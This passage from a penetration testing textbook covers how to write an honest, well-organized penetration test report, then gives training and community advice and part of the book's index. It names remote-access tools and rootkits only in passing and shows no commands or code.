11027ButtPlugins for BO" by reviewing the Defcon 6 media archives.
11028
11029Sub7 was originally released in 1999 by Mobman and functions in a client/
11030server manner similar to Netbus and Back Orifice. Like each of the other tools
11031discussed in this chapter, Sub7 is software that allows a client to remotely con-
11032trol a server. One interesting point about Sub7 is the fact that after a six-year
11033hiatus, where no development occurred, the project was revived and updated.
11034
11035If you are interested in expanding your knowledge of rootkits, it is important
11036to study and master the inner workings of modern operating systems. Learning
11037the intricate details of an operating system kernel may seem daunting at first,
11038but it is well worth your time.
11039
11040This chapter examined the Hacker Defender rootkit and provided a basic over-
11041view of the functionality and use of rootkits. It is important to understand that
11042this material only scratches the surface of rootkits. Advanced topics include
11043hooking system and function calls and understanding the difference between
11044user-mode and kernel-mode kits. Developing a solid grasp of system program-
11045ming and programming languages can be extremely beneficial as well.
11046
11047SUMMARY
11048
11049This chapter focused on the use and implementation of backdoors and root-
11050kits. Remember it is vital that you have proper authorization before utilizing
11051a rootkit or backdoor in a penetration test. This chapter began by introduc-
11052ing the powerful and flexible tool Netcat. Several uses of Netcat, including
11053implementing Netcat as a backdoor, are covered. Cryptcat, a modern version
11054of Netcat with the added ability to encrypt traffic between two machines, was
11055also discussed. The classic remote control program Netbus was introduced to
11056demonstrate the power of "command and control" software. The chapter con-
11057cluded with a brief overview of rootkits including their basic structure and use.
11058Specifically, the proper use, configuration, and implementation of the Hacker
11059Defender rootkit was covered.
11060
11061
11062
11063Information in This Chapter:
11064
11065â– Writing the Penetration Testing Report
11066
11067â– You Do Not Have to Go Home But You Cannot Stay Here
11068
11069â– Where Do I Go From Here?
11070
11071â– Wrap Up
11072
11073â– The Circle of Life
11074
11075
11076
11077INTRODUCTION
11078
11079Many people assume that once you have completed each of the four steps out-
11080lined in Chapters 2-6 on your target, the penetration test is over. Many new-
11081comers also assume that immediately following step 4, you can simply call the
11082client to discuss your findings or maybe even just send the client a bill for your
11083services. Unfortunately that is not the case. The reality is that once you wrap
11084up the technical details of a penetration test, there is still one task remaining.
11085After all of the reconnaissance, scanning, exploitation, and maintaining access
11086is complete, you need to summarize your findings in the form of a penetration
11087testing report.
11088
11089It is not uncommon to find extremely gifted hackers and penetration testers
11090who want to completely ignore this phase. These people have the skill and the
11091ability to compromise nearly any network, but they lack the skills to commu-
11092nicate the vulnerabilities, exploits, and mitigations to the client.
11093
11094In many respects, writing the penetration testing report is one of the most criti-
11095cal tasks that an ethical hacker performs. It is important to remember that in
11096many cases, the better you do your job as a penetration tester, the less your cli-
11097ent will actually notice or "feel" your work. As a result, the final report is often
11098the only tangible evidence that a client will receive from the penetration tester
11099and the PT process.
11100
11101
11102
11103The Basics of Hacking and Penetration Testing
11104
11105
11106
11107The penetration testing report often becomes the face of your organization
11108and reputation. Once the initial contract has been signed providing scope and
11109authorization, the penetration tester often disappears from the target organiza-
11110tion. The test itself occurs in a relatively isolated environment. Once the test is
11111completed, it is critical that the penetration tester present his or her findings
11112in a well thought-out, organized, and easy-to-understand manner. Again, it is
11113important to remember that in most cases the target organization (the com-
11114pany that is paying you) has no concept of what you have been doing or how
11115many hours you have put into the task. As a result, the penetration testing
11116report becomes the principal reflection of your competence. You have a respon-
11117sibility to the client to present your findings, but you also have an opportunity
11118to showcase your talent and explain how you spent the client's time and money
11119wisely.
11120
11121Do not underestimate the power or importance of this phase. In reality often-
11122times your perceived efforts and success will be judged based more on your
11123report than your actual success or failure to compromise a network. Ultimately,
11124the ability to write a good penetration testing report will win you repeat
11125business.
11126
11127
11128
11129WRITING THE PENETRATION TESTING REPORT
11130
11131Like every other topic we have discussed, writing a good penetration test-
11132ing report takes practice. Many penetration testers mistakenly think that they
11133can simply provide the raw output from the tools that they run. This group of
11134people will often collect and neatly organize the various outputs into a single
11135report. They will gather any pertinent information from the reconnaissance
11136phase and include it along with the output from Nmap and Nessus.
11137
11138Many of the tools we discussed in this book include a reporting engine. For
11139example, Nessus has several prebuilt reports that can be generated based off of
11140the scan. Unfortunately, using the prebuilt reports is not enough. Each report
11141must be well laid out and flow as a single document. Combining one style of
11142report from Nessus with a different style of report from Nmap or Metasploit
11143will make the penetration test report appear disjointed and unorganized.
11144
11145With that being said, it is important to provide the detailed output from each
11146of your tools. Not many of your clients will have the ability to understand the
11147technical output from Nmap or Nessus; however, remember the data does
11148belong to the client and it is important that they have access to the raw data.
11149
11150We have covered several examples of what not to do in a penetration test-
11151ing report; let us look at it from a different angle and discuss what should
11152be done.
11153
11154First and foremost, the penetration testing report needs to be broken into
11155several individual pieces. Taken together, these pieces will form your overall
11156report, but each piece should work as a stand-alone report as well.
11157
11158
11159
11160Wrapping Up the Penetration Test CHAPTER 7
11161
11162
11163
11164At a minimum, a well-rounded and presented penetration testing report should
11165include the following:
11166
111671. An executive summary
11168
111692. A detailed report
11170
111713. Raw output
11172
11173Executive Summary
11174
11175The executive summary should be a very brief overview of your major findings.
11176This document, or subreport, should not exceed two pages in length and only
11177include the highlights of the penetration test. The executive summary does not
11178provide technical details or terminology. This report needs to be written in the
11179context of board members and nontechnical management so that they can
11180understand your findings and any major concerns you discovered on the net-
11181work and systems.
11182
11183If vulnerability and exploits were discovered, the executive summary needs
11184to focus on explaining how these findings impact the business. The executive
11185summary should provide links and references to the detailed report so that
11186interested parties can review the technical nature of the findings. It is impor-
11187tant to remember that the executive summary must be very brief and written
11188at a high level. Most executive summaries should be written in such a way that
11189that the report writer's own grandmother would be able to understand what
11190occurred during the penetration test and what the major findings were.
11191
11192Detailed Report
11193
11194The second part in a well-rounded penetration testing report is the detailed
11195report. This report will include a comprehensive list of your findings as well
11196as the technical details. The audience for this report includes IT managers,
11197security experts, network administrators, and others who possess the skills
11198and knowledge required to read and comprehend its technical nature. In most
11199cases, this report will be used by the technical staff to understand the details of
11200what your test uncovered and how to address or fix these issues.
11201
11202As with every facet of the penetration test, it is important to be honest and
11203direct with the client. Although it may be tempting to emphasize your great
11204technical savvy and discuss how you owned a particular service, it is much more
11205important to present the facts to your client beginning with the issues that pose
11206the most danger to their networks and systems. Ranking the discovered vulnera-
11207bilities can be confusing and daunting for a new penetration tester, luckily most
11208tools like Nessus will provide you with a default ranking system. Always present
11209critical findings first. This makes your penetration test easier to read and allows
11210the client to read about and take action on the most serious findings first (with-
11211out having to dig through 50 pages of technical output).
11212
11213Because it is important it needs to be stated again, it is imperative that you put
11214the needs of the client before your ego. Consider the following example: assume
11215
11216
11217
11218The Basics of Hacking and Penetration Testing
11219
11220
11221
11222you are conducting a penetration test and are able to fully compromise a server
11223on your target's network. However, after further investigation and review, you
11224determine that the newly compromised system is of no value. That is, it holds
11225no data, is not connected to any other systems, and cannot be used to gain
11226further access to the network. Later in the penetration test, one of your tools
11227reports a critical vulnerability on a boarder router. Unfortunately, even after
11228having read the details of the vulnerability and running several tools, you are
11229unable to exploit the weakness and gain access to the system. Even though you
11230are unable to gain access to the boarder router, you are certain that the system
11231is vulnerable. You also know that because this device is a boarder router, if it is
11232compromised the entire network will be at risk.
11233
11234Of course it should go without saying that in this example both of these flaws
11235should be reported. However, the point is that in this case one flaw clearly
11236presents more danger than the other. In this situation, many newcomers may
11237be tempted to showcase their technical skills and successes by emphasizing
11238the fact that they were able to successfully compromise a server and downplay
11239the importance of the critical vulnerability because the penetration tester was
11240unable to exploit it. Never put yourself or your ego above the security of your
11241clients. Do not overstate the facts; simply report your findings to the best of your
11242ability in an objective manner. Let them make subjective decisions with the data
11243you provide. Never make up or falsify data in a penetration test. Never reuse
11244"proof-of-concept" screenshots. It can be tempting to take shortcuts by supply-
11245ing generic, reusable proofs, but it is a dangerous and unethical thing to do.
11246
11247The idea and use of proof-of-concept screenshots is a powerful tool and should
11248be incorporated into the penetration testing report whenever possible. Anytime
11249you discover a major finding or successfully complete an exploit, you should
11250include a screenshot in the detailed report. This will serve as undeniable evi-
11251dence and provide the reader with a visualization of your success.
11252
11253It is also good to remember, especially when you first start conducting penetra-
11254tion tests, that not every PT will result in a "win" or the successful compromise
11255of your target. In most situations, the penetration test is bound by some artifi-
11256cial rules that reduce the reality of the test. These include the demands imposed
11257by the client such as scope, time, and budget as well as the legal and ethical
11258restrictions that help define the boundaries of a penetration test. As you prog-
11259ress in your penetration testing career, you will undoubtedly encounter situa-
11260tions where your penetration test turns up completely blank, no vulnerabilities,
11261no weaknesses, no useful information gathered, etc. In these situations, you
11262still need to complete the penetration testing report. In these situations, the raw
11263tool output will provide the bulk of your report.
11264
11265Whenever possible, when writing the detailed penetration testing report, you
11266should include mitigations and suggestions for addressing the issues you dis-
11267covered. Some tools, like Nessus, will provide suggested mitigations. If your
11268tools do not provide precanned mitigations, then it is important that you
11269locate potential solutions on your own. If you are unsure of where to look for
11270
11271
11272
11273Wrapping Up the Penetration Test CHAPTER 7
11274
11275
11276
11277these solutions, most public exploits and vulnerabilities include details or steps
11278that can be taken to address the weakness. Use Google and the Internet to track
11279down specifics of the reported weaknesses. By reviewing the technical details of
11280a vulnerability, you will often find potential solutions. These typically include
11281downloading a patch or upgrading to a newer version of the software, although
11282they may discuss other resolutions such as configuration changes or hardware
11283upgrades.
11284
11285Providing solutions to each of the problems you discover is a vital part of the
11286detailed report. It will also serve to win you repeat business and help to distin-
11287guish yourself from other penetration testers.
11288
11289The findings in the detailed report should also include links and references to
11290specific pages in the raw output section. This is important because it will save
11291you time and confused phone calls from your clients who are wondering how
11292you discovered a particular issue. Providing clear references to the raw tool out-
11293put will allow the client to dig into the details without needing to contact you.
11294In this manner, you should be able to see how the report flows from executive
11295summary to detailed summary to raw output.
11296
11297Raw Output
11298
11299The final portion of the report should be the technical details and raw out-
11300put from each of the tools. In reality, not every penetration tester will agree
11301that this information needs to be included with the penetration testing report.
11302There is some merit to the arguments against including this detailed informa-
11303tion, which includes the fact that this information is often hundreds of pages
11304in length and can be very difficult to read and review. Another common argu-
11305ment often repeated from fellow penetration testers is that providing this level
11306of detail is unnecessary and allows the client to see exactly what tools were run
11307to perform the penetration test.
11308
11309If you are using custom tools, scripts, or other proprietary code to perform a
11310penetration test, you may not want to reveal this type of information directly
11311to your client. However, in most cases, it is usually safe to provide the direct
11312output of the tools used in the penetration test. This is not to say that you need
11313to provide the detailed commands and switches that were used to run tools
11314like Metasploit, Nmap, or custom code, but rather that you make the output of
11315those commands available. If you are concerned about disclosing the specific
11316commands used to run your tools, you may have to sanitize the raw output to
11317remove those commands and manually delete any other sensitive information
11318you do not want to be disclosed to the readers.
11319
11320From the view point of a basic penetration test, which typically includes each
11321of the tools we discussed in this book, it would not be out of the question
11322to simply include all the raw output at the end of the report. The reason for
11323this is simple — the tools and commands used to invoke each of the tools in a
11324basic penetration test are widely known and available. There is no real point in
11325hiding or attempting to obfuscate this information. Additionally, as mentioned
11326
11327
11328
11329The Basics of Hacking and Penetration Testing
11330
11331
11332
11333earlier, including the detailed output and making clear references to it in the
11334detailed report will often save you time and phone calls from frustrated clients
11335who do not understand your findings.
11336
11337Whether you decide to include the raw data as an actual component of the
11338report or you decide to include it as a separate document is entirely up to you.
11339Depending on the sheer size of this report, you may want to simply include it
11340as a secondary or stand-alone report and not attach it directly with the execu-
11341tive summary and the detailed reports.
11342
11343Another consideration that needs to be given some careful thought is how
11344you will present your report to the client. This is something that should be
11345discussed prior to the delivery of the report. From a purely time-management
11346and resource standpoint, it is often easiest to deliver the report as an electronic
11347document. In the case where the client requests a paper copy you will need to
11348professionally print, bind, and mail the document to the client. Be sure to send
11349the document via certified mail and always request a return receipt so you can
11350verify that the document was properly received.
11351
11352If you have agreed to deliver the document electronically you will need to
11353ensure that the penetration testing report is encrypted and remains confiden-
11354tial until it arrives in the client's hands. Remember a penetration testing report
11355often contains very sensitive information about the organization. You must
11356ensure the information contained in the report remains private. It would be
11357very embarrassing to have a report you created become public because you did
11358not take the basic measures needed to ensure confidentiality.
11359
11360There are several easy ways of ensuring confidentiality. You can use a tool
11361like 7zip to compress and add a password to the files. A much better way of
11362encrypting a document is to use a tool like TrueCrypt to encrypt the docu-
11363ments. TrueCrypt is an easy-to-use program and can be downloaded for free
11364from: http://www.truecrypt.org. Regardless of what type of encryption or pro-
11365tection scheme you use, your client will need to use the same tool to decrypt
11366and view the files. This is an arrangement that should be agreed upon before
11367the penetration test begins. Some of your clients may not understand even the
11368basics of cryptography. As a result, you may need to work with and train them
11369on the proper techniques needed to view your final report.
11370
11371Each section or individual subreport should be clearly labeled and should
11372begin on a new page. Under the heading of each report, it may be a good idea
11373to emphasize to the reader that the penetration test is only a snapshot in time.
11374The security of networks, computers, systems, and software is dynamic. Threats
11375and vulnerabilities change at lightning speed. As a result, a system that appears
11376completely impenetrable today can be easily compromised tomorrow if a new
11377vulnerability is discovered. As a way of indemnifying yourself against this rapid
11378change, it is important to communicate that the results of the test are accu-
11379rate as of the day you completed the assessment. Setting realistic client expecta-
11380tions is important. Remember, unless you fill a computer with concrete, drop
11381
11382
11383
11384Wrapping Up the Penetration Test CHAPTER 7
11385
11386
11387
11388it in the middle of the ocean, and unplug it from the Internet, there is always
11389a chance that the system can be hacked by some unknown technique or new
113900-day flaw.
11391
11392Finally, take your time to prepare, read, reread, and properly edit your report.
11393It is equally as important to provide a document that is technically accurate as
11394well as one that is free of spelling and grammar issues. Technical penetration
11395testing reports that contain grammar and spelling mistakes will indicate to your
11396client that you perform sloppy work and reflect negatively on you. Remember
11397the penetration testing report is a direct reflection of you and your ability. In
11398many cases, the report is the single output that your client will see from your
11399efforts. You will be judged based on the level of its technical detail and findings
11400as well as its overall presentation and readability.
11401
11402While you are reviewing your report for mistakes, take some time to closely
11403review the detailed output from your various tools. Remember, many of the
11404tools that we use are written by hackers with a sense of humor. Unfortunately,
11405hacker humor and the professional world do not always mesh. When I first
11406started as penetration tester, a colleague and I found ourselves in an embarrass-
11407ing situation. One of the tools that we were using had attempted to log into
11408a particular service several hundred times using the name "Peter Weiner." As
11409a result, our professional-looking report was filled with examples of a not-so-
11410professional user account belonging to Peter Weiner. It is not easy to go into a
11411boardroom full of professional, suit-wearing executives and discuss your ficti-
11412tious user named Peter Weiner.
11413
11414It is worth noting that in this case, the mistake was 100 percent mine. The
11415maker of the tool clearly discussed how to change this username in the con-
11416figuration settings. A more careful inspection of the reports would have caught
11417this before my presentation and given me time to correct it.
11418
11419Right or wrong, your reputation as a penetration tester will have a direct cor-
11420relation to the quality of the reports that you put out. Learning to craft a
11421well-written penetration test is critical for earning repeat customers and earn-
11422ing future business. It is always a good idea to have a sample report in hand.
11423Many prospective clients will ask for a sample report before making a final
11424decision. It is worth noting that a sample report should be just a sample. It
11425should not include any actual data from a real customer. Never give a previous
11426client's report out as a sample, as this could represent a massive violation of the
11427implied or contractual confidentiality between you and your client.
11428
11429To wrap up the report writing phase, it is worth mentioning that most clients
11430will expect you to be available after the report has been delivered. Because of
11431the technical and detailed nature of the penetration testing process and report,
11432you should expect to receive a few questions. Here again, taking time and
11433answering each question should be viewed as an opportunity to impress the
11434client and win future business rather than as an annoyance. Ultimately, good
11435customer service is worth its weight in gold and will often repay you 10-fold.
11436
11437
11438
11439The Basics of Hacking and Penetration Testing
11440
11441
11442
11443Naturally, your willingness to work with a client and provide additional services
11444has to make business sense as well. You are not required to "overservice" the
11445account and provide endless hours of free support, but rather you need to find
11446a balance between providing exceptional customer service and healthy profits.
11447
11448YOU DON'T HAVE TO GO HOME BUT YOU
11449CAN'T STAY HERE
11450
11451Assuming you have read the entire book (congrats by the way!), you are prob-
11452ably wondering "what's next?" The answer to that question depends entirely
11453on you. First, it is suggested that you practice and master the basic informa-
11454tion and techniques presented in this book. Once you are comfortable with the
11455basics, move onto the advanced topics and tools covered in the "Where Do I
11456Go from Here" section of each chapter.
11457
11458After mastering all the material in this book, you should have a solid under-
11459standing of the hacking and penetration testing process. You should feel
11460comfortable enough with the basic information that you are able to take on
11461advanced topics and even specialize.
11462
11463It is worth noting, however, that there is much more to hacking and penetra-
11464tion testing than just running tools. There are entire communities out there
11465that are built around these topics. You should become active in these com-
11466munities. Introduce yourself and learn by asking questions and observing. You
11467should give back to these communities whenever possible. Hacking, security,
11468and penetration testing communities are available through various websites,
11469online forums, ICQ, mailing lists, and news groups, and even in person.
11470
11471Chat rooms are a great place to learn more about security. Chat rooms are usu-
11472ally highly focused on a single topic and, as the name implies, typically involve
11473lots of communication over a wide variety of subtopics pertaining to the over-
11474all theme of the room. In many respects, a chat room is like sitting at a bar and
11475listening to the conversations around you. You can participate by asking ques-
11476tions or simply by sitting quietly and reading the conversations of everyone in
11477the room.
11478
11479If you have never been to a security conference (also known as a "CON"), you
11480owe it to yourself to go. Defcon is an annual hacker convention held in Las
11481Vegas at the end of each summer. Yes it is a bit of a circus, yes there are more
11482than 11,000 people attending, and yes it is hot in Las Vegas in August. But
11483despite all that, Defcon remains one of the single best security communities
11484on earth. In general the crowds are very pleasant, the Goons (official Defcon
11485workers) are friendly and helpful, and the community is open and inviting. The
11486price of admission is peanuts compared to some of the other security events,
11487and one more thing — the talks are amazing.
11488
11489The quality and variety of talks at Defcon are nothing short of mind boggling.
11490Talks vary each year, but they are sure to include the topics of network hacking,
11491web app security, physical security, hardware hacking, lock picking, and many
11492
11493
11494
11495Wrapping Up the Penetration Test CHAPTER 7
11496
11497
11498
11499more. The speakers are not only approachable, more often than not they are
11500willing to take time and talk to you, answering your questions one on one. It
11501is consistently amazing how approachable and helpful CON speakers are. It
11502is natural to be a little nervous when approaching someone at a conference,
11503especially if you have been part of an online community where "newbies" are
11504put down and questions are discouraged; however, if you take the initiative,
11505you will often be pleasantly surprised by the openness of the entire Defcon
11506community.
11507
11508If you cannot make it to the official Defcon conference, you should try to
11509get involved in other security communities that are closer to you. InfraGard,
11510OWASP, the Backtrack-Linux forums, and many others are great resources
11511for you.
11512
11513Reading this book and joining a security community are great ways to expand
11514your horizons and learn additional and advanced security concepts. Following
11515a thread or seeing a talk will often spur an interest in a specific security topic.
11516
11517Once you have mastered the basics, you can look at diving more deeply into a
11518particular area of security. Most people learn the basics, then tend to special-
11519ize in a particular area. This is not something you have to choose today, and
11520becoming specialized in a single area does not preclude you from becoming
11521specialized in other areas. However, in general, most people tend to be highly
11522focused with an advanced knowledge in one or two areas of security. The list
11523below is just a small sample of topics that you can specialize in. It is not meant
11524to be all-inclusive but rather to provide you with a sample of the various areas
11525that require advanced training:
11526
11527â– Offensive Security/ Ethical Hacking
11528
11529â– Web Application Security
11530
11531â– System Security
11532
11533â– Reverse Engineering
11534
11535â– Tool Development
11536
11537â– Malware Analysis
11538
11539â– Defensive Security
11540
11541â– Software Security
11542
11543â– Digital Forensics
11544
11545â– Wireless Security
11546
11547
11548
11549WHERE DO I GO FROM HERE?
11550
11551After reading this book, you may be hungry to learn more about a particular
11552topic, step, or technique that was discussed. Now that you have mastered the
11553basics, there should be many additional doors open to you. If you have truly
11554studied, practiced, and understood the basic material presented in this book,
11555you are equipped to tackle more advanced training.
11556
11557Remember one of the main motivations for writing a book like this was not
11558to turn you into an elite hacker or penetration tester but rather to provide you
11559
11560
11561
11562The Basics of Hacking and Penetration Testing
11563
11564
11565
11566with a springboard for advancing your knowledge. With a firm understand-
11567ing of the basics, you should feel confident and prepared to take on advanced
11568training in any of the areas we discussed. There are many opportunities for you
11569to take your skill to the next level.
11570
11571If you enjoyed learning by reading this book, Syngress has a series of truly amaz-
11572ing hacking books over a wide range of topics including (listed alphabetically)
11573
11574â– Aggressive Network Self-Defense: by Neil R. Wyler, Bruce Potter, and Chris Hurley
11575
11576â– A Guide to Kernel Exploitation: by Enrico Perla, Massimiliano Oldani
11577
11578â– Managed Code Rootkits: by Erez Metula
11579
11580â– Nessus Network Auditing: by Russ Rogers
11581
11582â– Ninja Hacking: by Thomas Wilhelm and Jason Andress
11583
11584â– PenTester's Open Source Tookit: by Jeremy Faircloth, Chris Hurley, and Jesse
11585Varsalone
11586
11587â– Professional Penetration Testing: by Thomas Wilhelm
11588
11589â– Seven Deadliest Attack Series
11590
11591• Seven Deadliest Microsoft Attacks: by Rob Kraus, Brian Barber, Mike Borkin,
11592and Naomi Alpern
11593
11594• Seven Deadliest Network Attacks: by Stacy Prowell, Rob Kraus, and Mike
11595Borkin
11596
11597• Seven Deadliest Social Network Attacks: by Carl Timm and Richard Perez
11598
11599• Seven Deadliest Unified Communications Attacks: by Dan York
11600
11601• Seven Deadliest USB Attacks: by Brian Anderson and Barbara Anderson
11602
11603• Seven Deadliest Web Application Attacks: by Mike Shema
11604
11605• Seven Deadliest Wireless Technologies Attacks: by Brad Haines
11606
11607â– Stealing the Network: The Complete Series: by Johnny Long, Ryan Russell, and
11608Timothy Mullen
11609
11610If you are interested in a more "hands-on" learning approach, there are many
11611great two- to five-day security boot camps available to you. These classes are
11612often expensive and very labor-intensive, but often highly worth their price of
11613admission. The Black Hat conference usually offers a series of highly special-
11614ized and focused classes delivered by some of the most well-known names in
11615security today. There are literally dozens of security topics and specializations
11616to choose from at these events. The trainings change from year to year, but you
11617can find them on the Black Hat website at: http://www.blackhat.com
11618
11619The crew responsible for creating and distributing Backtrack Linux also offer a
11620hands-on highly intense series of classes. These classes will challenge you and
11621push you by making you work through a series of realistic scenarios.
11622
11623Even traditional universities are beginning to get into the security mode
11624today. Just a few years ago, it was difficult to find any security-related cur-
11625riculum. Now most universities offer at least one class or devote time during
11626a class to cover some security. Dakota State University in Madison, SD, offers
11627an entire Bachelor's Degree in Computer and Network Security along with a
11628Master's Degree in Information Assurance and a Doctorate of Science with a
11629Specialization in Information Assurance.
11630
11631
11632
11633Wrapping Up the Penetration Test CHAPTER 7
11634
11635
11636
11637If you are interested in pursuing a security-related degree through a higher
11638education institution, you are highly encouraged to attend an NSA-accredited
11639Center of Academic Excellence. These programs are information assurance
11640education degrees that have undergone a designation by the National Security
11641Agency or the Department of Homeland Security to verify the value of the cur-
11642riculum. You can find more about this program at: http://www.nsa.gov/ia/
11643academic_outreach/nat_cae/index.shtml
11644
11645It is well worth your time to take a close look and examine the various security
11646testing methodologies including the Open Source Security Testing Methodology
11647Manual (OSSTMM). This book focused on the specific tools and methods used
11648in a penetration test. OSSTMM provides security professionals with a well-
11649defined, mature framework that can be implemented in conjunction with many
11650of the topics covered in this book.
11651
11652Another great penetration testing methodology can be found at: http://www.
11653vulnerabilityassessment.co.uk. The Penetration Testing Framework (PTF) is an
11654excellent resource for penetration testers and security assessment teams. The
11655PTF includes assessment templates as well as a robust list of tools that can be
11656used to conduct each phase.
11657
11658WRAP UP
11659
11660If you read the book from front to back, take a minute to stop and consider
11661all that you learned. At this point, you should have a solid understanding of
11662the various steps involved in a typical penetration test and the tools required
11663to complete each of the steps. More importantly, you should understand how
11664the penetration testing process flows and how to take the information and out-
11665put from each of the phases and feed those results into the next phase. Many
11666people are eager to learn about hacking and penetration testing, but most new-
11667comers only understand how to run a single tool or complete a single step.
11668They refuse to see the big picture and often end up spinning their wheels in
11669frustration when their tool does not work or provides unexpected results. This
11670group does not realize how the entire process works and how to leverage the
11671power of each phase to strengthen the phases that come after it.
11672
11673For those of you who stuck with the book, completed each of the examples,
11674and gave an honest effort at following along, at the very least, this book should
11675have provided you with the knowledge and ability to see the big picture and
11676understand the importance of each phase.
11677
11678You also now should have the ability to answer the question posed to you in a
11679scenario at the beginning of Chapter 2:
11680
11681Assume you are an ethical penetration tester working for a security
11682company. Your boss walks over to your office and hands you a piece
11683of paper. "I just got off the phone with the CEO of that company.
11684He wants my best employee to Pen Test his company - that's you.
11685Our Legal Department will be sending you an email confirming we
11686
11687
11688
11689The Basics of Hacking and Penetration Testing
11690
11691
11692
11693have all of the proper authorizations and insurance". You nod,
11694accepting the job. He leaves. You flip over the paper, a single word is
11695written on the paper, "Syngress." It's a company you've never heard of
11696before, and no other information is written on the paper.
11697
11698What now?
11699
11700THE CIRCLE OF LIFE
11701
11702One of the greatest attributes of penetration testing and hacking is that you
11703never reach the end. Just about the time you master a particular topic or tech-
11704nique, someone develops a new method, attack, or procedure. That is not to
11705say that your original skillset is obsolete. On the contrary, a solid understand-
11706ing of the basics provides you with a lifelong foundation for learning the
11707advanced topics and staying current with the rapid pace of change.
11708
11709Enjoy the journey!
11710
11711Patrick
11712
11713SUMMARY
11714
11715This chapter focused on the importance of writing the penetration testing report
11716and examined specific details about what needs to be included and poten-
11717tial pitfalls for hackers who have never written a penetration testing report.
11718The importance of presenting a quality report to the client was emphasized.
11719The chapter concluded with suggestions about where you can go to further
11720enhance your hacking skills once you have mastered the basics. Specific recom-
11721mendations for getting advanced training and becoming part of the security
11722community were also outlined.
11723
11724
11725
11726
11727
11728Index
11729
11730
11731
11732A
11733
11734Access, maintaining, 127
11735Back Orifice, 144
11736Neat, 143-144
11737Netbus, 134-135
11738Netcat, 128-133
11739
11740Cryptcat, 133-134
11741practicing, 142-143
11742rootkits, 135-141
11743detecting and defending against,
11744
11745141-142
11746Hacker Defender, 137-141
11747Socat, 143-144
11748SubSeven (Sub7), 144
11749Access Control Lists (ACLs), 56
11750ACLs. See Access Control Lists
11751(ACLs)
11752
11753Active reconnaissance, 18, 25
11754Advanced security concepts, 153
11755AFP, 67
11756
11757"Allintitle:" directive, 23
11758APT (Advanced Package Tool), 4
11759Attack vectors, 66, 108, 121
11760Authorization, 3
11761
11762B
11763
11764Back Orifice, 144
11765
11766Backtrack, 5, 6, 26-27, 36, 69,
11767
1176883-84
11769working with, 6-9
11770Backtrack Linux, 3-6, 154
11771Base64, 116
11772Bdclil00.exe, 137
11773Ben Owned, 38, 80, 86, 118, 119
11774Bind and reverse payloads, difference
11775
11776between, 80
11777Bing, 26
11778
11779Black Hat conference, 154
11780
11781Brute forcing letter combinations, 87
11782
11783Burp Proxy, 125
11784
11785Burp Suite, 125
11786
11787c
11788
11789CANVAS, 71
11790Carl-Fredrik, 134
11791
11792
11793
11794Chat rooms, 152
11795
11796Circle of life, 156
11797
11798Cisco ASA firewall, 20-21
11799
11800Code injection attacks, 116-120
11801
11802Core Impact, 62, 71
11803
11804Cross-site scripting (XSS), 121-123
11805
11806Cryptcat, 133-134
11807
11808D
11809
11810Dakota State University website, 22
11811
11812Dawes, Rogan, 111
11813
11814Defcon, 152-153
11815
11816Defcon, 6, 144
11817
11818Defcon, 12, 70
11819
11820Defcon, 13, 21
11821
11822De-ICE CDs, 102
11823
11824DHCP server, 7, 8
11825
11826Dig, 35-36
11827
11828DirectXploit, 144
11829
11830DNS servers. See Domain Name
11831
11832Systems (DNS) servers
11833Domain Name Systems (DNS)
11834
11835servers, 28, 29
11836extracting information from,
11837
1183832-36
11839Dsniff, 94
11840
11841E
11842
11843E-mail address, 25, 26, 68, 77
11844E-mail server, extracting information
11845
11846from, 36
11847"ethO" interface, 7-8
11848Ethereal, 95
11849
11850Ethical hackers, 2, 3, 18, 57
11851
11852and malicious hacker, 3
11853Ettercap, 104
11854Executive summary, 147
11855Exploitation, 13, 65
11856
11857Ettercap, 104
11858
11859Fast-Track Autopwn, 97-100
11860Hydra, 67, 103-104
11861John the Ripper, 81-89
11862macof program, 93-97
11863Medusa, 67-70
11864Metasploit, 70-81, 104-105
11865network traffic, sniffing, 92-93
11866
11867
11868
11869password resetting, 89-92
11870practicing, 100-103
11871RainbowCrack, 104
11872target and desired goal, 103-105
11873Wireshark, 104
11874
11875F
11876
11877Facebook, 25-26
11878
11879"Fail closed", concept of, 94
11880
11881"Fail open", concept of, 94
11882
11883Fast-Track Autopwn, 97-100
11884
11885fdisk tool, 84
11886
11887Fedora Security Spin, 14
11888
11889"filetype:" directive, 24
11890
11891"First Order XSS", 123
11892
11893FPing, 47
11894
11895FTP, 67, 96, 97
11896
11897G
11898
11899Gmail, 25
11900Google, 21, 22-26
11901Google cache, 23-24
11902Google-Fu, 22, 40
11903Google Hacking, 21
11904Google Hacking for Penetration Testers,
1190521, 40
11906
11907Graphical user interface (GUI),
1190848-49
11909
11910GUI. See Graphical user interface
11911(GUI)
11912
11913H
11914
11915Hacker Defender, 137-141
11916Hacking lab, use and creation of,
119179-10
11918
11919Harvester, 26-28, 68
11920
11921accessing, 26-27
11922
11923output, 28
11924Hash, 82
11925HD Moore, 70, 71
11926Hobbit, 128
11927
11928Host command, 29, 31-32, 33
11929
11930output, 32
11931Hotmail, 25
11932hsdeflOO file, 137
11933
11934
11935
11936Index
11937
11938
11939
11940HTTP, 67
11941HTTrack, 19-22
11942accessing, 19
11943Hub, 93
11944
11945hxdeflOO.exe, 137
11946hxdeflOO.ini, 137, 140
11947Hydra, 67, 103-104
11948ICMP Echo Request packets, 46
11949
11950I
11951
11952"ifconfig", 7, 8
11953IMAP, 67
11954
11955Information gathering. See
11956
11957Reconnaissance
11958Insecure.org, 62
11959Internet, 108
11960"intitle:" directive, 23
11961"inurl:" directive, 23
11962.iso image, 5
11963
11964J
11965
11966John the Ripper (JtR), 81-89, 103
11967
11968K
11969
11970KATANA, 14
11971
11972K-Start dragon, 19, 72, 98, 112
11973
11974L
11975
11976Lan Manager (LM), 86
11977Linux, 5, 46, 57
11978
11979passwords, cracking of, 88-89
11980Linux Backtrack, 77
11981LM. See Lan Manager (LM)
11982Lodge, David, 108
11983Long, Johnny
11984
11985Defcon, 13, 21
11986
11987Google Hacking Database
11988(GHDB), 40
11989"lo" interface, 7-8
11990
11991M
11992
11993macof program, 93-97
11994Maintaining access. See Access,
11995
11996maintaining
11997Malicious hacker and ethical
11998
11999hackers, 3, 28
12000"Man host" command, 32
12001Martorella, Christian, 26
12002Matriux, 14
12003Medusa, 67-70
12004
12005practicing, 103
12006MetaGooFil, 36-37
12007
12008information gathering with, 69
12009
12010
12011
12012Metasploit, 16, 17, 70-81, 94, 97,
12013
12014102, 146
12015Metasploitable, 102
12016"Metasploit Unleashed", 102
12017Meterpreter, 79-81, 83, 104-105,
12018
12019132-133
12020Microsoft, 5, 7, 86, 87
12021Mobman, 144
